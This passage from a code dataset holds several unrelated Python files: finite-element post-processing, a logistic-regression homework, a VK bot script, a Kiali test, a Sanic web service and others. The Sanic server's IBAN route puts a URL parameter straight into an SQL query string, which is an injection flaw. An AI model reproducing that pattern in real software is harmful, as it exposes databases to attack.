structure.node_xyz(ep)\r\n dL = distance_point_point(xyz_sp, xyz_ep)\r\n arclengths.append(length + dL / 2.)\r\n length += dL\r\n\r\n return nodes, elements, arclengths, length\r\n\r\n\r\ndef normalise_data(data, cmin, cmax):\r\n\r\n \"\"\" Normalise a vector of data to between -1 and 1.\r\n\r\n Parameters\r\n ----------\r\n data : array\r\n Raw data.\r\n cmin : float\r\n Cap data values >= cmin.\r\n cmax : float\r\n Cap data values <= cmax.\r\n\r\n Returns\r\n -------\r\n array\r\n -1 to 1 scaled data.\r\n float\r\n The maximum absolute unscaled value.\r\n\r\n \"\"\"\r\n\r\n f = asarray(data)\r\n fmax = cmax if cmax is not None else max(abs(f))\r\n fmin = cmin if cmin is not None else min(abs(f))\r\n fabs = max([abs(fmin), abs(fmax)])\r\n fscaled = f / fabs if fabs else f\r\n fscaled[fscaled > +1] = +1\r\n fscaled[fscaled < -1] = -1\r\n\r\n return fscaled, fabs\r\n\r\n\r\ndef postprocess(nodes, elements, ux, uy, uz, data, dtype, scale, cbar, ctype, iptype, nodal):\r\n\r\n \"\"\" Post-process data from analysis results for given step and field.\r\n\r\n Parameters\r\n ----------\r\n nodes : list\r\n [[x, y, z], ..] co-ordinates of each node.\r\n elements : list\r\n Node numbers that each element connects.\r\n ux : list\r\n List of nodal x displacements.\r\n uy : list\r\n List of nodal y displacements.\r\n uz : list\r\n List of nodal z displacements.\r\n data : dic\r\n Unprocessed data.\r\n dtype : str\r\n 'nodal' or 'element'.\r\n scale : float\r\n Scale displacements for the deformed plot.\r\n cbar : list\r\n Minimum and maximum limits on the colorbar.\r\n ctype : int\r\n RGB color type, 1 or 255.\r\n iptype : str\r\n 'mean', 'max' or 'min' of an element's integration point data.\r\n nodal : str\r\n 'mean', 'max' or 'min' for nodal values.\r\n\r\n Returns\r\n -------\r\n float\r\n Time taken to process data.\r\n list\r\n Scaled deformed nodal co-ordinates.\r\n list\r\n Nodal colors.\r\n float\r\n Absolute maximum nodal data value.\r\n list\r\n Normalised data values.\r\n list\r\n Element colors.\r\n float\r\n Absolute maximum element data value.\r\n\r\n \"\"\"\r\n\r\n tic = time()\r\n\r\n dU = hstack([array(ux)[:, newaxis], array(uy)[:, newaxis], array(uz)[:, newaxis]])\r\n U = [list(i) for i in list(array(nodes) + scale * dU)]\r\n\r\n vn, ve = process_data(data=data, dtype=dtype, iptype=iptype, nodal=nodal, elements=elements, n=len(U))\r\n\r\n fscaled, fabs = normalise_data(data=vn, cmin=cbar[0], cmax=cbar[1])\r\n cnodes = colorbar(fsc=fscaled, input='array', type=ctype)\r\n\r\n if dtype == 'element':\r\n escaled, eabs = normalise_data(data=ve, cmin=cbar[0], cmax=cbar[1])\r\n celements = colorbar(fsc=escaled, input='array', type=ctype)\r\n celements_ = [list(i) for i in list(celements)]\r\n else:\r\n eabs = 0\r\n celements_ = []\r\n\r\n toc = time() - tic\r\n cnodes_ = [list(i) for i in list(cnodes)]\r\n fabs_ = float(fabs)\r\n fscaled_ = [float(i) for i in list(fscaled)]\r\n\r\n return toc, U, cnodes_, fabs_, fscaled_, celements_, float(eabs)\r\n\r\n\r\ndef process_data(data, dtype, iptype, nodal, elements, n):\r\n\r\n \"\"\" Process the raw data.\r\n\r\n Parameters\r\n ----------\r\n data : dic\r\n Unprocessed data.\r\n dtype : str\r\n 'nodal' or 'element'.\r\n iptype : str\r\n 'mean', 'max' or 'min' of an element's integration point data.\r\n nodal : str\r\n 'mean', 'max' or 'min' for nodal values.\r\n elements : list\r\n Node numbers that each element connects.\r\n n : int\r\n Number of nodes.\r\n\r\n Returns\r\n -------\r\n array\r\n Data values for each node.\r\n array\r\n Data 
values for each element.\r\n\r\n \"\"\"\r\n\r\n if dtype == 'nodal':\r\n vn = array(data)[:, newaxis]\r\n ve = None\r\n\r\n elif dtype == 'element':\r\n m = len(elements)\r\n ve = zeros((m, 1))\r\n\r\n for ekey, item in data.items():\r\n fdata = [i for i in item.values() if i is not None]\r\n if not fdata:\r\n fdata = [0]\r\n if iptype == 'max':\r\n v = max(fdata)\r\n elif iptype == 'min':\r\n v = min(fdata)\r\n elif iptype == 'mean':\r\n v = sum(fdata) / len(fdata)\r\n ve[int(ekey)] = v\r\n\r\n rows, cols = [], []\r\n for c, i in enumerate(elements):\r\n rows.extend([c] * len(i))\r\n cols.extend(i)\r\n sdata = [1] * len(rows)\r\n A = csr_matrix((sdata, (rows, cols)), shape=(m, n))\r\n AT = A.transpose()\r\n\r\n if nodal == 'mean':\r\n vsum = asarray(AT.dot(ve))\r\n vn = vsum / sum(AT, 1)\r\n else:\r\n vn = zeros((n, 1))\r\n ATa = AT.todense()\r\n for i in range(n):\r\n row = ATa[i, :].transpose()\r\n col = (row == 1)\r\n val = ve[col]\r\n if nodal == 'max':\r\n vn[i] = max(val)\r\n elif nodal == 'min':\r\n vn[i] = min(val)\r\n\r\n return vn, ve\r\n\r\n\r\ndef plotvoxels(values, U, vdx, plot=True, indexing=None):\r\n\r\n \"\"\" Plot values as voxel data.\r\n\r\n Parameters\r\n ----------\r\n values : array\r\n Normalised data at nodes.\r\n U : array\r\n Nodal co-ordinates.\r\n vdx : float\r\n Representative volume size for a voxel.\r\n plot : str\r\n Plot voxels using compas VtkVoxels 'vtk'.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n \"\"\"\r\n\r\n U = array(U)\r\n x = U[:, 0]\r\n y = U[:, 1]\r\n z = U[:, 2]\r\n xmin, xmax = min(x), max(x)\r\n ymin, ymax = min(y), max(y)\r\n zmin, zmax = min(z), max(z)\r\n X = linspace(xmin, xmax, (xmax - xmin) / vdx)\r\n Y = linspace(ymin, ymax, (ymax - ymin) / vdx)\r\n Z = linspace(zmin, zmax, (zmax - zmin) / vdx)\r\n Xm, Ym, Zm = meshgrid(X, Y, Z)\r\n if indexing:\r\n Zm, Ym, Xm = meshgrid(X, Y, Z, indexing='ij')\r\n\r\n f = abs(asarray(values))\r\n Am = squeeze(griddata(U, f, (Xm, Ym, Zm), method='linear', fill_value=0))\r\n Am[isnan(Am)] = 0\r\n\r\n if plot == 'vtk':\r\n voxels = VtkVoxels(data=Am)\r\n voxels.start()\r\n\r\n return Am\r\n\r\n\r\ndef tets_from_vertices_faces(vertices, faces, volume=None):\r\n\r\n \"\"\" Generate tetrahedron points and elements with MeshPy (TetGen).\r\n\r\n Parameters\r\n ----------\r\n vertices : list\r\n List of lists of vertex co-ordinates for input surface mesh.\r\n faces : list\r\n List of lists of face indices for input surface mesh.\r\n volume : float\r\n Volume constraint for each tetrahedron element.\r\n\r\n Returns\r\n -------\r\n list\r\n Points of the tetrahedrons.\r\n list\r\n Indices of points for each tetrahedron element.\r\n\r\n \"\"\"\r\n\r\n try:\r\n info = MeshInfo()\r\n info.set_points(vertices)\r\n info.set_facets(faces)\r\n tets = build(info, max_volume=volume)\r\n tets_points = [list(i) for i in list(tets.points)]\r\n tets_elements = [list(i) for i in list(tets.elements)]\r\n return tets_points, tets_elements\r\n except:\r\n print('***** MeshPy failed *****')\r\n\r\n\r\ndef principal_stresses(data, ptype, scale, rotate):\r\n\r\n \"\"\" Performs principal stress calculations.\r\n\r\n Parameters\r\n ----------\r\n data : dic\r\n Element data from structure.results for the Step.\r\n ptype : str\r\n 'max' 'min' for maximum or minimum principal stresses.\r\n scale : float\r\n Scale on the length of the vectors.\r\n rotate : int\r\n Rotate lines by 90 deg, 0 or 1.\r\n\r\n Returns\r\n -------\r\n array\r\n Vectors for section point 1.\r\n array\r\n Vectors for section point 5.\r\n array\r\n Principal 
stresses for section point 1.\r\n array\r\n Principal stresses for section point 5.\r\n\r\n \"\"\"\r\n\r\n axes = data['axes']\r\n s11 = data['sxx']\r\n s22 = data['syy']\r\n s12 = data['sxy']\r\n spr = data['s{0}p'.format(ptype)]\r\n\r\n ekeys = spr.keys()\r\n m = len(ekeys)\r\n s11_sp1 = zeros(m)\r\n s22_sp1 = zeros(m)\r\n s12_sp1 = zeros(m)\r\n spr_sp1 = zeros(m)\r\n s11_sp5 = zeros(m)\r\n s22_sp5 = zeros(m)\r\n s12_sp5 = zeros(m)\r\n spr_sp5 = zeros(m)\r\n e11 = zeros((m, 3))\r\n e22 = zeros((m, 3))\r\n\r\n for ekey in ekeys:\r\n i = int(ekey)\r\n e11[i, :] = axes[ekey][0]\r\n e22[i, :] = axes[ekey][1]\r\n s11_sp1[i] = s11[ekey]['ip1_sp1']\r\n s22_sp1[i] = s22[ekey]['ip1_sp1']\r\n s12_sp1[i] = s12[ekey]['ip1_sp1']\r\n spr_sp1[i] = spr[ekey]['ip1_sp1']\r\n s11_sp5[i] = s11[ekey]['ip1_sp5']\r\n s22_sp5[i] = s22[ekey]['ip1_sp5']\r\n s12_sp5[i] = s12[ekey]['ip1_sp5']\r\n spr_sp5[i] = spr[ekey]['ip1_sp5']\r\n\r\n th1 = tile((0.5 * arctan2(s12_sp1, 0.5 * (s11_sp1 - s22_sp1)) + 0.5 * pi * rotate)[:, newaxis], (1, 3))\r\n th5 = tile((0.5 * arctan2(s12_sp5, 0.5 * (s11_sp5 - s22_sp5)) + 0.5 * pi * rotate)[:, newaxis], (1, 3))\r\n er1 = e11 * cos(th1) + e22 * sin(th1)\r\n er5 = e11 * cos(th5) + e22 * sin(th5)\r\n vec1 = er1 * (tile(spr_sp1[:, newaxis], (1, 3)) * scale / 10**7 + 0.0001)\r\n vec5 = er5 * (tile(spr_sp5[:, newaxis], (1, 3)) * scale / 10**7 + 0.0001)\r\n\r\n return vec1, vec5, spr_sp1, spr_sp5\r\n\r\n\r\n# ==============================================================================\r\n# Debugging\r\n# ==============================================================================\r\n\r\nif __name__ == \"__main__\":\r\n\r\n pass\r\n","sub_path":"src/compas_fea/utilities/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":23702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"274895091","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nx_data = pd.read_csv(\"./resource/X_train\", encoding=\"big5\").iloc[:, 1:]\r\nx = np.array(x_data)\r\n\r\ny_data = pd.read_csv(\"./resource/Y_train\", encoding=\"big5\").iloc[:, 1:]\r\ny = np.array(y_data)\r\n\r\nX_train = x\r\nY_train = y\r\ndata_dim = X_train.shape[1]\r\n\r\n\r\ndef sigmoid(a):\r\n return 1 / (1 + np.exp(-a))\r\n\r\n\r\ndef accuracy(y_pred, y_label):\r\n return ((y_label - y_pred.reshape(y_label.shape)) == 0).sum() / y_label.size\r\n\r\n\r\n\"\"\"discriminative\"\"\"\r\nmean_x = np.mean(x, axis=0)\r\nstd_x = np.std(x, axis=0)\r\nfor i in range(len(x)):\r\n x[i] = (x[i] - mean_x) / (std_x + 1e-8)\r\n\r\nx = np.concatenate((np.ones([x.shape[0], 1]), x), axis=1)\r\nw = np.zeros([x.shape[1], 1])\r\n\r\nlearning_rate = 0.001\r\niter_time = 101\r\n\r\nfor t in range(iter_time):\r\n w -= learning_rate / np.sqrt(t + 1) * np.dot(x.T, sigmoid(np.dot(x, w)) - y)\r\n if t % 100 == 0:\r\n print(accuracy(np.round(sigmoid(np.dot(x, w))), y))\r\n\r\n\"\"\"generative【*未掌握】\"\"\"\r\nx = x[:, 1:]\r\n# Compute in-class mean\r\nX_train_0 = np.array([x for x, y in zip(X_train, Y_train) if y == 0])\r\nX_train_1 = np.array([x for x, y in zip(X_train, Y_train) if y == 1])\r\n\r\nmean_0 = np.mean(X_train_0, axis=0)\r\nmean_1 = np.mean(X_train_1, axis=0)\r\n\r\n# Compute in-class covariance\r\ncov_0 = np.zeros((data_dim, data_dim))\r\ncov_1 = np.zeros((data_dim, data_dim))\r\n\r\nfor _x in X_train_0:\r\n cov_0 += np.dot(np.transpose([_x - mean_0]), [_x - mean_0]) / X_train_0.shape[0]\r\nfor _x in X_train_1:\r\n cov_1 += np.dot(np.transpose([_x - mean_1]), [_x - mean_1]) / 
X_train_1.shape[0]\r\n\r\n# Shared covariance is taken as a weighted average of individual in-class covariance.\r\ncov = (cov_0 * X_train_0.shape[0] + cov_1 * X_train_1.shape[0]) / (X_train_0.shape[0] + X_train_1.shape[0])\r\n\r\n# Compute inverse of covariance matrix.\r\n# Since covariance matrix may be nearly singular, np.linalg.inv() may give a large numerical error.\r\n# Via SVD decomposition, one can get matrix inverse efficiently and accurately.\r\nu, s, v = np.linalg.svd(cov, full_matrices=False)\r\ninv = np.matmul(v.T * 1 / s, u.T)\r\n\r\n# Directly compute weights and bias\r\nw = np.dot(inv, mean_0 - mean_1)\r\nb = (-0.5) * np.dot(mean_0, np.dot(inv, mean_0)) + 0.5 * np.dot(mean_1, np.dot(inv, mean_1)) \\\r\n    + np.log(float(X_train_0.shape[0]) / X_train_1.shape[0])\r\n\r\n\r\ndef _f(X, w, b):\r\n    return sigmoid(np.matmul(X, w) + b)\r\n\r\n\r\ndef _predict(X, w, b):\r\n    # np.int is a removed numpy alias; the builtin int keeps the same behaviour\r\n    return np.round(_f(X, w, b)).astype(int)\r\n\r\n\r\n# Compute accuracy on training set\r\nY_train_pred = 1 - _predict(X_train, w, b)\r\nprint('Training accuracy: {}'.format(accuracy(Y_train_pred, Y_train)))\r\n","sub_path":"src/hw2_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"547646386","text":"import vk\nimport operator\nimport argparse\nimport datetime\nimport logging\nfrom importlib.machinery import SourceFileLoader\nfrom mongoengine import connect\n\nfrom luckybot.util.logger import init_logger\nfrom luckybot.model.access_token import AccessToken\nfrom luckybot.model.contest import Contest\n\nfrom distributor import calculate_factor\n\n\n# Parse the command-line arguments\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-t', '--tokens', type=str, default='objects/access_token.json',\n                        help='Path to file with access tokens for VK API')\n    parser.add_argument('-n', '--number', type=int, default=32,\n                        help='The number of contests that are sent out daily to moderators')\n    return parser.parse_args()\n\n\nif __name__ == '__main__':\n    try:\n        init_logger()\n        args = parse_args()\n        config = SourceFileLoader('*', 'server.conf').load_module()\n        database = connect(db=config.mongo_database, host=config.mongo_host, port=int(config.mongo_port),\n                           username=config.mongo_username, password=config.mongo_password)\n        access_token = AccessToken(args.tokens)\n        vk_session = vk.Session(access_token=config.access_token)\n        vk_api = vk.API(vk_session, v='5.65', lang='ru')\n\n        date = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time()) + datetime.timedelta(days=1)\n        contests = list(Contest.objects(date=date, city__size=0))\n        contest_factor = calculate_factor(contests, access_token)\n        contests = sorted(contest_factor.items(), key=operator.itemgetter(1))\n        contests.reverse()\n        posts = [post_id for post_id, factor in contests[:args.number]]\n        message = '\\n
'.join(['[%d] https://vk.com/wall%s' % (index + 1, post_id) for index, post_id in enumerate(posts)])\n\n receivers = vk_api.groups.getMembers(group_id=config.group_id, filter='managers')['items']\n user_ids = ','.join(map(lambda member: str(member['id']), receivers))\n vk_api.messages.send(user_ids=user_ids, message=message)\n except Exception as msg:\n logging.error(str(msg))\n","sub_path":"preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"454527709","text":"import os\nimport conftest\nimport time\n\nPARAMS = {'duration': '1m'}\n\n\ndef test_kiali_route_rules(kiali_client):\n environment_configmap = conftest.__get_environment_config__(conftest.ENV_FILE)\n route_rule_configmap = conftest.__get_environment_config__(conftest.ROUTE_RULE_FILE)\n\n add_command_text = \"oc apply -n \" + environment_configmap.get('mesh_bookinfo_namespace') + \" -f \" + os.path.abspath(os.path.realpath(conftest.ROUTE_RULE_FILE))\n\n add_command_result = os.popen(add_command_text).read()\n\n assert add_command_result.__contains__(\"created\") or add_command_result.__contains__(\"configured\")\n\n graph = kiali_client.graph_namespace(namespace=environment_configmap.get('mesh_bookinfo_namespace'), params=PARAMS)\n\n assert graph is not None\n\n nodes = kiali_client.graph_namespace(namespace=environment_configmap.get('mesh_bookinfo_namespace'), params=PARAMS)[\"elements\"]['nodes']\n\n assert nodes is not None\n\n #route_rule_count = get_route_rule_count(kiali_client, environment_configmap)\n\n assert get_route_rule_count(kiali_client, environment_configmap) > 0\n\n delete_command_text = \"oc delete routerule \" + route_rule_configmap['metadata']['name'] + \" -n \" + environment_configmap.get('mesh_bookinfo_namespace')\n\n delete_command_result = os.popen(delete_command_text).read()\n\n assert delete_command_result.__contains__(\"deleted\")\n\n time.sleep(10)\n\n # Validate that JSON no longer has Route Rules\n assert get_route_rule_count(kiali_client, environment_configmap) == 0\n\ndef get_route_rule_count(kiali_client, environment_configmap):\n\n nodes = kiali_client.graph_namespace(namespace=environment_configmap.get('mesh_bookinfo_namespace'), params=PARAMS)[\n \"elements\"]['nodes']\n\n assert nodes is not None\n\n route_rule_count = 0\n for node in nodes:\n if 'hasRR' in node[\"data\"] and node[\"data\"][\"hasRR\"] == \"true\":\n route_rule_count = route_rule_count + 1\n\n return route_rule_count","sub_path":"tests/test_kiali_route_rules.py","file_name":"test_kiali_route_rules.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"180586619","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 28 21:37:57 2020\n\n@author: yavar02\n\"\"\"\n\nimport os\nimport re\nimport glob\n\nfrom ase.io import read, write\n\n\n\n\ndef qeinpgen(ciffile, guipref, guicalc, guiecut, guiecutrho, guidia, guioccup,\n guismear, guimixmode, guimixbeta, guidegauss, guispin, guimaxstep, guikspace, guipseudo):\n '''\n \n\n Parameters\n ----------\n ciffile : TYPE\n DESCRIPTION.\n guipref : TYPE\n DESCRIPTION.\n guicalc : TYPE\n DESCRIPTION.\n guiecut : TYPE\n DESCRIPTION.\n guiecutrho : TYPE\n DESCRIPTION.\n guidia : TYPE\n DESCRIPTION.\n guioccup : TYPE\n DESCRIPTION.\n guismear : TYPE\n DESCRIPTION.\n guimixmode : TYPE\n DESCRIPTION.\n guimixbeta : TYPE\n DESCRIPTION.\n guidegauss : 
TYPE\n        DESCRIPTION.\n    guispin : TYPE\n        DESCRIPTION.\n\n    Returns\n    -------\n    None.\n\n    '''\n    test = read(ciffile)\n    pwiname = ciffile[:-3] + 'pwi'\n    guiinp_data = {'prefix': guipref, 'electron_maxstep': guimaxstep, 'outdir': './', 'pseudo_dir': './', 'tstress': True,\n                   'tprnfor': True, 'calculation': guicalc, 'ecutrho': guiecutrho, 'verbosity': 'high',\n                   'ecutwfc': guiecut, 'diagonalization': guidia, 'occupations': guioccup,\n                   'smearing': guismear, 'mixing_mode': guimixmode, 'mixing_beta': guimixbeta,\n                   'degauss': guidegauss, 'nspin': guispin}\n\n    write(pwiname, test, input_data=guiinp_data, pseudopotentials=guipseudo, kspacing=guikspace, crystal_coordinates=True)\n\n    return\n","sub_path":"GUI/aseqeinpgen.py","file_name":"aseqeinpgen.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"576168233","text":"from flor import flags\n\nimport uuid\nfrom pathlib import Path, PurePath\nfrom datetime import datetime\n\nhome = Path.home()\nflorin = home / '.flor'\nflorin.mkdir(exist_ok=True)\n\njob = None\ndata = None\ntimestamp = None\n\n\ndef mk_job(name: str):\n    global timestamp, job, data\n    assert isinstance(name, str)\n    timestamp = datetime.now().isoformat()\n    job = florin / name\n    job.mkdir(exist_ok=True)\n    data = job / PurePath('data')\n    data.mkdir(exist_ok=True)\n\n\ndef get_index():\n    return job / PurePath(\n        flags.INDEX if flags.REPLAY else timestamp\n    ).with_suffix('.json')\n\n\ndef get_latest():\n    return job / PurePath('latest').with_suffix('.json')\n\n\ndef get_pkl_ref() -> PurePath:\n    while True:\n        candidate = data / PurePath(uuid.uuid4().hex).with_suffix('.pkl')\n        if not candidate.exists():\n            return candidate\n\n\ndef verify(path: PurePath):\n    assert flags.NAME is not None\n    resolved_path = florin / flags.NAME / path \n    return Path(resolved_path).exists()\n\n\n","sub_path":"flor/shelf/directory.py","file_name":"directory.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"479044292","text":"list1=[0,1,2,3,4,5,6,7,8,9]\nlist1.reverse()  # reverse the list\n# join the digits into a string\nlist2=[str(x) for x in list1]  # convert each element to a string\na=''.join(list2)\nb=a[3:9]\nd=b[::-1]\ne=int(d)\n\nf=bin(e)  # binary\ng=oct(e)  # octal\nh=hex(e)  # hexadecimal\nprint(f)\nprint(g)\nprint(h)\n","sub_path":"19100302/7Lou/d5_exercise_array.py","file_name":"d5_exercise_array.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"472033557","text":"\"\"\"\nThe Paster application entry point.\n\"\"\"\n\nfrom datetime import datetime, date\nimport decimal\n\nfrom pyramid.events import BeforeRender\nfrom pyramid.config import Configurator\nfrom pyramid.renderers import JSON\nfrom pyramid.static import QueryStringConstantCacheBuster\n\nfrom clang_ast_webservice import helpers\nfrom clang_ast_webservice.assets import assets_version\n\n\ndef application(_global_config, **settings):\n    \"\"\" Returns the Pyramid WSGI application.\n    \"\"\"\n\n    config = Configurator(settings=settings)\n    config.include('pyramid_debugtoolbar')\n    config.include('pyramid_mako')\n\n    config.add_subscriber(set_renderer_context, BeforeRender)\n\n    config.add_static_view(\n        name='assets', path='clang_ast_webservice.assets:',\n        cache_max_age=2592000)\n    config.add_cache_buster(\n        'clang_ast_webservice.assets:',\n        QueryStringConstantCacheBuster(assets_version))\n\n    config.include(add_json_renderer)\n\n    
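# add_json_renderer (defined below) registers datetime/date/Decimal adapters on the JSON renderer; '.index' pulls in the app's index routes\n    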
config.include('.index')\n\n return config.make_wsgi_app()\n\n\ndef set_renderer_context(event):\n if not event['renderer_name'].endswith('.mako'):\n return\n event['h'] = helpers\n\n\ndef add_json_renderer(config):\n json_renderer = JSON()\n\n def datetime_adapter(obj, request):\n return \"{}Z\".format(obj.isoformat())\n\n def date_adapter(obj, request):\n return obj.isoformat()\n\n def decimal_adapter(obj, request):\n return str(obj)\n\n json_renderer.add_adapter(datetime, datetime_adapter)\n json_renderer.add_adapter(date, date_adapter)\n json_renderer.add_adapter(decimal.Decimal, decimal_adapter)\n\n config.add_renderer('json', json_renderer)\n","sub_path":"clang_ast_webservice/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"525568502","text":"#!/usr/bin/env python3\n\nimport hashlib\nimport uuid\nimport time\nimport os\nimport requests\nimport threading\nimport datetime\nimport logging\nimport urllib.parse\nimport base64\nimport psycopg2\nimport psycopg2.extras\nimport sys\n# import json\n\nfrom json import dumps, dump, loads, load\nfrom urllib.parse import unquote\nfrom subprocess import check_output\nfrom random import randint\nfrom stdnum import iban\nfrom sanic import Sanic\nfrom sanic import response\nfrom sanic.response import json\nfrom environs import Env\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import update, table, column, select, text\n\n# from sanic_cors import CORS, cross_origin\n# from sanic.log import logger\n# from PIL import Image\n# from databases import Database\n\nlogging_format = \"[%(asctime)s] %(process)d-%(levelname)s \"\nlogging_format += \"%(module)s::%(funcName)s():l%(lineno)d: \"\nlogging_format += \"%(message)s\"\n\nlogging.basicConfig(\n format=logging_format,\n level=logging.INFO\n)\nlog = logging.getLogger()\n\n\nenv = Env()\n# Read .env into os.environ\nenv.read_env()\n\nSettings = {}\n\npwd = os.path.dirname(os.path.abspath(__file__))\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\napp = Sanic(name='a-bu.ch')\n\n# app.config.from_object(Settings)\n# app.config['CORS_AUTOMATIC_OPTIONS'] = True\n\n# CORS(app)\n# cors = CORS(app, automatic_options=True, resources={r\"/v1/*\": {\"origins\": \"sepa.digital\"}})\n# cors = CORS(app, resources={r\"/v1/*\": {\"origins\": \"*\"}})\n\n\n# DB / App setup\ndef setup_database():\n @app.listener('after_server_start')\n # conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n async def connect_to_db(*args, **kwargs):\n # TODO .env\n app.db = psycopg2.connect(\"host='51.158.130.90' port='25120' dbname='abuch' user='' password=''\")\n # app.db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n return app.db\n\n @app.listener('after_server_stop')\n async def disconnect_from_db(*args, **kwargs):\n # app.db.close() # TODO disconnect again \n return True\n #return app.db.disconnect()\n\n\n# tmp helper\nnextDbId = lambda: int(round(time.time() * 10) + randint(10, 1000))\n\n# txUUID = lambda: str(uuid.uuid5(uuid.NAMESPACE_DNS, 'a-bu.ch'))\ntxUUID = lambda: str(uuid.uuid4())\n\n# App routes\n@app.route('/')\ndef service_handle_request(request):\n return response.redirect('/v1/heartbeat')\n\n\n@app.route('/v1/heartbeat')\nasync def service_heartbeat(request):\n return response.json({\"status\": \"up\", \"service\": \"a-bu.ch\", \"time\": int(time.time())})\n\n@app.route('/v1/heartbeat/db')\nasync def service_heartbeat_db(request):\n\n # setup_database()\n cur = 
app.db.cursor()\n    cur.execute(\"SELECT * FROM tx\")\n    app.db.commit()\n\n    msg = ''\n    while True:\n        row = cur.fetchone()\n\n        if row is None:\n            break\n\n        msg = {'tx': [{\"reference\": row[1]}]}\n\n    #rows = cur.fetchone()\n    # return response.json({\"status\": \"up\", \"service\": \"db.sepa.digital\", \"time\": int(time.time())})\n    return response.json(msg)\n\n\n@app.route(\"/inbox\", methods=[\"POST\", \"GET\", 'OPTIONS'])\ndef post_inbox(request):\n    open(pwd + \"/../data/inbox.json\", \"a\")\n\n    with open(pwd + \"/../data/inbox.json\", 'r') as f:\n        inbox = load(f)\n\n    if request.json:\n        inbox.append(request.json)\n\n    with open(pwd + \"/../data/inbox.json\", 'w') as f:\n        dump(inbox, f)\n\n    if request.json and 'mail' in request.json:\n        msg = \"Thanks for your message -- we'll get in touch and reply to \" + \\\n            str(request.json['email'])\n    elif request.json and 'tel' in request.json:\n        msg = \"Thanks for your message -- we'll get in touch and call you at \" + \\\n            str(request.json['tel'])\n    else:\n        msg = \"Aloha! What's your message?\"\n\n    return json({\"status\": \"success\", \"message\": msg})\n\n\n@app.route('/v1/iban/<iban>', methods=['GET', 'OPTIONS'])\nasync def iban_details(request, iban):\n\n    query = \"select * from iban where uuid = '\" + iban + \"'\" # TODO SECURITY \n\n    try:\n        # setup_database()\n\n        # engine = create_engine(\"postgresql://user:pwd@IP:port/db\") # , echo=True\n        # conn = engine.connect()\n        app.db = psycopg2.connect(\"host='51.158.130.90' port='25120' dbname='iban' user='' password=''\")\n        cur = app.db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n        cur.execute(query)\n        app.db.commit()\n    except Exception:\n        resp = {\"status\": \"error\", \"message\": \"error -- no db connection\"}\n        return response.json(resp)\n\n    txData = None\n    while True:\n        row = cur.fetchone()\n\n        if row is None:\n            break\n\n        txData = row\n\n    print('######### tx:', str(txData))\n\n    if txData is not None:\n        log.info(\"claim / entity data -- %s\" % txData['status'] + \" - \" + str(txData['uuid']))\n        # a DictCursor row converts cleanly to a plain dict for the JSON response;\n        # without this branch, resp was undefined on the success path\n        resp = {\"status\": \"success\", \"tx\": dict(txData)}\n    else:\n        log.info(\"claim / entity data -- Error not found\")\n        resp = {\"status\": \"error\", \"message\": \"404 Error - no tx found\"}\n\n    return response.json(resp)\n\n\n# run token/api server\nif __name__ == '__main__':\n    env = Env()\n    env.read_env()\n    \n    # app.config.from_object(Settings)\n    # log.info(\"DEBUG \" + str(app.config.DEBUG))\n    # setup_database()\n\n    # app.run(host='0.0.0.0', port=8010, workers=4, debug=app.config.DEBUG, access_log=app.config.DEBUG) # config\n    app.run(host='0.0.0.0', port=8010, workers=1, debug=True, access_log=True) # config\n\n\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"190144381","text":"from faker import Faker, Factory\nfrom nose.plugins.attrib import attr\nfrom nose.plugins.skip import SkipTest\nfrom nose.tools import *\n\nfrom clients import users\n\n\nclass TestUsers(object):\n    fake = Faker()\n\n    def __get_minimal_user(self):\n        return {'name': self.fake.name()}\n\n    def __get_full_user(self, fake):\n        return {\n            \"name\": fake.name(),\n            \"username\": fake.user_name(),\n            \"email\": fake.email(),\n            \"address\": {\n                \"street\": fake.street_name(),\n                \"city\": fake.city(),\n                \"zipcode\": fake.zipcode() if hasattr(fake, 'zipcode') else None,\n                \"geo\": {\n                    \"lat\": str(fake.latitude()),\n                    \"lng\": str(fake.longitude())\n                }\n            },\n            \"phone\": fake.phone_number(),\n            \"website\": fake.words(1)[0] + \".org\",\n            \"company\": 
